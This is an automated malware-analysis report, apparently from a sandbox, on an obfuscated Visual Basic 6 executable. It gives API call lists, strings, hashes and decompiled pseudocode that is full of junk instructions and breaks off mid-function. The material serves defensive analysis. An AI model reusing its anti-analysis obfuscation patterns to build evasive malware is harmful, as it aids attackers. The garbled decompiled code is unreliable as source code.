__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,000000A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBBF
__vbaNew2.MSVBVM60(0040A5BC,pi,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CBE6
__vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC1F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B19C,000001A0,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC6C
__vbaNew2.MSVBVM60(0040A5BC,pi,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CC93
__vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CCCC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000128,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CD19
__vbaNew2.MSVBVM60(0040A5BC,pi,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CD40
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CD79
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,000000F0,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CDC3
__vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,?,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CDE5
__vbaI4Var.MSVBVM60(?), ref: 0040CDF4
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AE70,00000704), ref: 0040CE86
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?), ref: 0040CEB0
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?), ref: 0040CEBE
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AE40,000002B4), ref: 0040CEF5
__vbaVarForInit.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040CF69
__vbaVarDup.MSVBVM60(?,?,?,00000002,00000002,00000002), ref: 0040CF99
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AE70,00000708), ref: 0040D00D
__vbaFreeVar.MSVBVM60(00000000,004011C8,0040AE70,00000708), ref: 0040D027
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D03F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D078
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B1AC,00000068), ref: 0040D0BF
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D0E6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D11F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1BC,00000090), ref: 0040D16C
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D193
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D1CC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,000000F8), ref: 0040D216
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D23D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D276
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,000001DC), ref: 0040D2C0
__vbaStrMove.MSVBVM60(00000000,?,0040B19C,000001DC), ref: 0040D33E
__vbaChkstk.MSVBVM60(00000003), ref: 0040D379
__vbaChkstk.MSVBVM60(?,?,418E7D50,?,?,?,00000008,00000003), ref: 0040D3BD
__vbaFreeStr.MSVBVM60(?,?,?,00000008,00000003), ref: 0040D3DF
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,00000008,00000003), ref: 0040D3F6
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D40E
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D429
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D462
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,00000048), ref: 0040D4A6
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D4CD
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D506
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,000000E8), ref: 0040D553
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D57A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D5B3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1BC,00000058), ref: 0040D5F7
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040D619
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D634
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D66D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000060), ref: 0040D6B4
__vbaI4Var.MSVBVM60(?), ref: 0040D6DB
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AE70,0000070C,?,?,?,?,?), ref: 0040D7A0
__vbaFreeObjList.MSVBVM60(00000005,?,?,?,?,?,?,?,?,?,?), ref: 0040D7D3
__vbaFreeVarList.MSVBVM60(00000002,00000008,?), ref: 0040D7EB
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D806
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D83F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,00000170), ref: 0040D889
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D8B0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D8E9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000110), ref: 0040D936
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040D95D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D996
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000070), ref: 0040D9DD
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040DA04
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040DA3D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000128), ref: 0040DA8A
__vbaChkstk.MSVBVM60(?,?,?), ref: 0040DB07
__vbaChkstk.MSVBVM60(00005D72,?,?,?,?), ref: 0040DB2A
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,?,?), ref: 0040DB5B
__vbaFreeVar.MSVBVM60 ref: 0040DB69
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AE70,00000710), ref: 0040DBA5
__vbaVarMove.MSVBVM60(00000000,004011C8,0040AE70,00000710), ref: 0040DBC2
__vbaVarForNext.MSVBVM60(?,?,?), ref: 0040DBD9
__vbaFreeVarList.MSVBVM60(00000002,?,?,0040DC93), ref: 0040DC72
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DC7D
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DC85
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0040DC8D

Strings

RRETS, xrefs: 0040CF79
overstiges, xrefs: 0040CA2F
BZ, xrefs: 0040C832
z_, xrefs: 0040CF1D
pi, xrefs: 0040C2BB, 0040C2C4, 0040C2D3, 0040C2DF, 0040C35F, 0040C368, 0040C377, 0040C383, 0040C403, 0040C40C, 0040C41B, 0040C427, 0040C56A, 0040C573, 0040C582, 0040C58E, 0040C614, 0040C61D, 0040C62C, 0040C638, 0040C6B8, 0040C6C1, 0040C6D0, 0040C6DC, 0040C765, 0040C76E, 0040C77D, 0040C789, 0040C96E, 0040C977, 0040C986, 0040C992, 0040CB26, 0040CB2F, 0040CB3E, 0040CB4A, 0040CBD3, 0040CBDC, 0040CBEB, 0040CBF7, 0040CC80, 0040CC89, 0040CC98, 0040CCA4, 0040CD2D, 0040CD36, 0040CD45, 0040CD51, 0040D02C, 0040D035, 0040D044, 0040D050, 0040D0D3, 0040D0DC, 0040D0EB, 0040D0F7, 0040D180, 0040D189, 0040D198, 0040D1A4, 0040D22A, 0040D233, 0040D242, 0040D24E, 0040D416, 0040D41F, 0040D42E, 0040D43A, 0040D4BA, 0040D4C3, 0040D4D2, 0040D4DE, 0040D567, 0040D570, 0040D57F, 0040D58B, 0040D621, 0040D62A, 0040D639, 0040D645, 0040D7F3, 0040D7FC, 0040D80B, 0040D817, 0040D89D, 0040D8A6, 0040D8B5, 0040D8C1, 0040D94A, 0040D953, 0040D962, 0040D96E, 0040D9F1, 0040D9FA, 0040DA09, 0040DA15
21:21:21, xrefs: 0040C137
T5, xrefs: 0040C846
Underbevidsthed, xrefs: 0040C8CC

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckHresult$New2$Free$ChkstkList$Move$CallLate$#543InitNext
String ID: 21:21:21$RRETS$Underbevidsthed$overstiges$pi$z_$BZ$T5
API String ID: 2874494357-1300449134
Opcode ID: 5a7efa0a598d5fbba603e32566a698753b50c3112a8dddc18c8fad1b91157cc8
Instruction ID: 50df6aa17efaf84e67bfbddfa3838085a3d881f6e74fa603d100b00f2bdeb307
Opcode Fuzzy Hash: 5a7efa0a598d5fbba603e32566a698753b50c3112a8dddc18c8fad1b91157cc8
Instruction Fuzzy Hash: 3BF2D27190022C9FDB21DF90CC49BDDBBB4BB08304F1045EAE549BB2A1DBB95AC59F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBE8, Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040EBE8(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a8, void* _a52) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v36;
				void* _v52;
				void* _v56;
				char _v60;
				char _v64;
				char _v80;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v96;
				signed int _v100;
				char* _t39;
				signed int _t43;
				char* _t44;
				char* _t46;
				intOrPtr _t66;

				_push(0x4012a6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t66;
				_push(0x50);
				L004012A0();
				_v12 = _t66;
				_v8 = 0x401250;
				L004013E4();
				L004013E4();
				if( *0x410010 != 0) {
					_v96 = 0x410010;
				} else {
					_push("p�i");
					_push(0x40a5bc);
					L004013DE();
					_v96 = 0x410010;
				}
				_t39 =  &_v60;
				L004013CC();
				_v84 = _t39;
				_t43 =  *((intOrPtr*)( *_v84 + 0x120))(_v84,  &_v64, _t39,  *((intOrPtr*)( *((intOrPtr*)( *_v96)) + 0x310))( *_v96));
				asm("fclex");
				_v88 = _t43;
				if(_v88 >= 0) {
					_v100 = _v100 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40b1ac);
					_push(_v84);
					_push(_v88);
					L004013D8();
					_v100 = _t43;
				}
				_push(0);
				_push(0);
				_push(_v64);
				_t44 =  &_v80;
				_push(_t44); // executed
				L004013BA(); // executed
				_push(_t44);
				L0040142C();
				L0040145C();
				_push(_t44);
				_push(L"Koinciderede4");
				_push(L"Sequences");
				_push(L"TANKRENSNING"); // executed
				L0040134E(); // executed
				L00401462();
				_push( &_v64);
				_t46 =  &_v60;
				_push(_t46);
				_push(2);
				L004013C6();
				L00401450();
				_push(E0040ED43);
				L00401450();
				L00401450();
				return _t46;
			}

0x0040ebed
0x0040ebf8
0x0040ebf9
0x0040ec00
0x0040ec03
0x0040ec0b
0x0040ec0e
0x0040ec1b
0x0040ec26
0x0040ec32
0x0040ec4c
0x0040ec34
0x0040ec34
0x0040ec39
0x0040ec3e
0x0040ec43
0x0040ec43
0x0040ec67
0x0040ec6b
0x0040ec70
0x0040ec7f
0x0040ec85
0x0040ec87
0x0040ec8e
0x0040ecaa
0x0040ec90
0x0040ec90
0x0040ec95
0x0040ec9a
0x0040ec9d
0x0040eca0
0x0040eca5
0x0040eca5
0x0040ecae
0x0040ecb0
0x0040ecb2
0x0040ecb5
0x0040ecb8
0x0040ecb9
0x0040ecc1
0x0040ecc2
0x0040eccc
0x0040ecd1
0x0040ecd2
0x0040ecd7
0x0040ecdc
0x0040ece1
0x0040ece9
0x0040ecf1
0x0040ecf2
0x0040ecf5
0x0040ecf6
0x0040ecf8
0x0040ed03
0x0040ed08
0x0040ed35
0x0040ed3d
0x0040ed42

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040EC03
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EC1B
__vbaVarDup.MSVBVM60(?,?,?,?,004012A6), ref: 0040EC26
__vbaNew2.MSVBVM60(0040A5BC,pi,?,?,?,?,004012A6), ref: 0040EC3E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040EC6B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000120), ref: 0040ECA0
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040ECB9
__vbaStrVarMove.MSVBVM60(00000000), ref: 0040ECC2
__vbaStrMove.MSVBVM60(00000000), ref: 0040ECCC
#690.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040ECE1
__vbaFreeStr.MSVBVM60(TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040ECE9
__vbaFreeObjList.MSVBVM60(00000002,?,?,TANKRENSNING,Sequences,Koinciderede4,00000000,00000000), ref: 0040ECF8
__vbaFreeVar.MSVBVM60(Koinciderede4,00000000,00000000), ref: 0040ED03
__vbaFreeVar.MSVBVM60(0040ED43,Koinciderede4,00000000,00000000), ref: 0040ED35
__vbaFreeVar.MSVBVM60(0040ED43,Koinciderede4,00000000,00000000), ref: 0040ED3D

Strings

Koinciderede4, xrefs: 0040ECD2
TANKRENSNING, xrefs: 0040ECDC
pi, xrefs: 0040EC2B, 0040EC34, 0040EC43, 0040EC4C
C@, xrefs: 0040ED32
Sequences, xrefs: 0040ECD7

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$#690CallCheckChkstkHresultLateListNew2
String ID: C@$Koinciderede4$Sequences$TANKRENSNING$pi
API String ID: 1502117440-711557648
Opcode ID: 2c94815cd9cf88fbd74030c334030fcc1e5a3e4df25abfbb5801924e3000f812
Instruction ID: 9684629672410d0d1afb5bfb72d336b1fe6fc7e9d5d8ae41077ac5ae7a74f802
Opcode Fuzzy Hash: 2c94815cd9cf88fbd74030c334030fcc1e5a3e4df25abfbb5801924e3000f812
Instruction Fuzzy Hash: 0731F571900208ABDB04EBD2DC46FDDBBB8AF08708F10453AF502BA1E1DBB869558B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401494, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112COMMON

Download Yara Rule

APIs

#100.MSVBVM60(VB5!6&*), ref: 00401499

Strings

VB5!6&*, xrefs: 00401494

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: 7530c7c3bffa86fe79f10e9da2b0cbc641ea51d53e3172b344f69110f7dc3286
Instruction ID: 4bfa9245ec20d1f9242ffae0f78f9c866fa6884d5285a7d50f0ff37a3f2dcf2c
Opcode Fuzzy Hash: 7530c7c3bffa86fe79f10e9da2b0cbc641ea51d53e3172b344f69110f7dc3286
Instruction Fuzzy Hash: 0531546644E3D15FD70397344DA52927FB0AE23214B1E89EBC4C1DF0F7E168190AC76A

Uniqueness

Uniqueness Score: -1.00%

Function 004027B2, Relevance: 1.7, APIs: 1, Instructions: 464
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E004027B2(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;

				_t59 = __ebx;
				while(1) {
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						__edi = __edi + 1;
						__eflags = __edi;
						asm("clc");
						asm("fabs");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L54;
					_push(es);
				}
			}

0x004027b2
0x0040279f
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x00000000
0x0040279e
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c01905b0256a65e88802d0f492d33ffc92eeeefc031eaf51294ba6d058a7085
Instruction ID: 75c2950e793a60f784b8f00747e9babc336af0a98b90c4e87227f592eee99c99
Opcode Fuzzy Hash: 8c01905b0256a65e88802d0f492d33ffc92eeeefc031eaf51294ba6d058a7085
Instruction Fuzzy Hash: 8481BD5292EA5586D20A3920864C6715D48FF97343330EB7BC8A7B50F166BE0E8B748E

Uniqueness

Uniqueness Score: -1.00%

Function 004027F0, Relevance: 1.7, APIs: 1, Instructions: 434
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E004027F0(signed int __eax, signed int __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, signed long long __fp0) {
				signed char _t63;
				void* _t64;
				intOrPtr* _t67;
				void* _t69;
				void* _t71;
				unsigned char _t109;
				void* _t129;
				void* _t132;
				void* _t142;
				void* _t143;
				void* _t167;
				void* _t168;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t198;
				void* _t200;
				void* _t202;
				void* _t203;
				void* _t204;
				void* _t219;
				void* _t221;
				void* _t222;
				void* _t282;
				signed long long _t300;
				void* _t301;
				void* _t302;

				_t300 = __fp0;
				_t194 = __edi;
				_t167 = __edx;
				_t129 = __ecx;
				_t109 = __ebx;
				asm("outsb");
				_t63 = __eax & __ebx;
				_t219 = __esi + 1;
				if(_t219 < 0) {
					asm("out 0xe6, al");
					goto L51;
				} else {
					if(__eflags < 0) {
						L51:
						asm("out 0xe6, al");
						goto L52;
					} else {
						if(__eflags < 0) {
							L52:
							asm("out 0xe6, al");
							goto L53;
						} else {
							if(__eflags < 0) {
								L53:
								asm("out 0xe6, al");
								goto L54;
							} else {
								if(__eflags < 0) {
									L54:
									asm("out 0xe6, al");
									goto L55;
								} else {
									if(__eflags < 0) {
										L55:
										asm("out 0xe6, al");
										goto L56;
									} else {
										if(__eflags < 0) {
											L56:
											asm("out 0xe6, al");
											goto L57;
										} else {
											if(__eflags < 0) {
												L57:
												asm("out 0xe6, al");
												goto L58;
											} else {
												if(__eflags < 0) {
													L58:
													asm("out 0xe6, al");
													goto L59;
												} else {
													if(__eflags < 0) {
														L59:
														asm("out 0xe6, al");
														goto L60;
													} else {
														if(__eflags < 0) {
															L60:
															asm("out 0xe6, al");
															goto L61;
														} else {
															if(__eflags < 0) {
																L61:
																asm("out 0xe6, al");
																goto L62;
															} else {
																if(__eflags < 0) {
																	L62:
																	asm("out 0xe6, al");
																	goto L63;
																} else {
																	if(__eflags < 0) {
																		L63:
																		asm("out 0xe6, al");
																		goto L64;
																	} else {
																		if(__eflags < 0) {
																			L64:
																			asm("out 0xe6, al");
																			goto L65;
																		} else {
																			if(__eflags < 0) {
																				L65:
																				asm("out 0xe6, al");
																				goto L66;
																			} else {
																				if(__eflags < 0) {
																					L66:
																					_t129 = _t129 - 1 + 1;
																					goto L67;
																				} else {
																					if(__eflags < 0) {
																						L67:
																						_t195 = _t194 - 1;
																						asm("wait");
																						goto L68;
																					} else {
																						if(__eflags < 0) {
																							L68:
																							asm("fyl2xp1");
																							goto L69;
																						} else {
																							if(__eflags < 0) {
																								L69:
																							} else {
																								if(__eflags < 0) {
																									_t1 = __edi + 0x1c1c5c2b;
																									 *_t1 =  *((intOrPtr*)(__edi + 0x1c1c5c2b)) + __cl;
																									__eflags =  *_t1;
																									goto L71;
																								} else {
																									if(__eflags < 0) {
																										L71:
																										__eflags = __ebx;
																										goto L72;
																									} else {
																										if(__eflags < 0) {
																											L72:
																											asm("sbb al, 0x1c");
																											goto L73;
																										} else {
																											if(__eflags < 0) {
																												L73:
																												asm("sbb al, 0x1c");
																												goto L74;
																											} else {
																												if(__eflags < 0) {
																													L74:
																													asm("sbb al, 0x1c");
																													goto L75;
																												} else {
																													if(__eflags < 0) {
																														L75:
																														asm("sbb al, 0x1c");
																														goto L76;
																													} else {
																														if(__eflags < 0) {
																															L76:
																															asm("sbb al, 0x1c");
																															goto L77;
																														} else {
																															if(__eflags < 0) {
																																L77:
																																asm("sbb al, 0x1c");
																																goto L78;
																															} else {
																																if(__eflags < 0) {
																																	L78:
																																	asm("sbb al, 0x1c");
																																	goto L79;
																																} else {
																																	if(__eflags < 0) {
																																		L79:
																																		asm("sbb al, 0x1c");
																																		goto L80;
																																	} else {
																																		if(__eflags < 0) {
																																			L80:
																																			asm("sbb al, 0x1c");
																																			goto L81;
																																		} else {
																																			if(__eflags < 0) {
																																				L81:
																																				asm("sbb al, 0x1c");
																																				goto L82;
																																			} else {
																																				if(__eflags < 0) {
																																					L82:
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																					asm("sbb al, 0x1c");
																																				} else {
																																					L49:
																																					_t63 = _t64 + 1;
																																					asm("clc");
																																					_t129 = _t132 - 1;
																																					asm("fsubrp st4, st0");
																																					asm("fsqrt");
																																					goto L66;
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				_t194 = _t195 + 1;
				if(_t129 != 0) {
					asm("fnop");
					_t168 = _t167 - 1;
					asm("punpcklwd xmm5, xmm3");
					asm("fprem");
					_t167 = _t168 + 1;
					asm("wait");
					asm("fninit");
					_t300 = _t300 / st5;
					asm("pcmpgtd mm4, mm0");
					_t132 = _t129 - 1 + 1;
					_t196 = _t194 - 1;
					asm("pxor mm6, mm4");
					asm("fdivr st7, st0");
					_t194 = _t196 + 1;
					asm("clc");
					asm("fabs");
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t109 = _t109 >> 0x3f;
					asm("aas");
					_t64 = _t63 - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					goto L49;
				}
				asm("wait");
				asm("fclex");
				asm("packsswb mm5, mm1");
				asm("fldl2t");
				asm("paddd xmm2, xmm0");
				_t67 = __imp__#690;
				asm("clc");
				asm("fst st1");
				asm("fdivrp st3, st0");
				_t197 = _t194 - 1;
				asm("psubusb xmm4, xmm5");
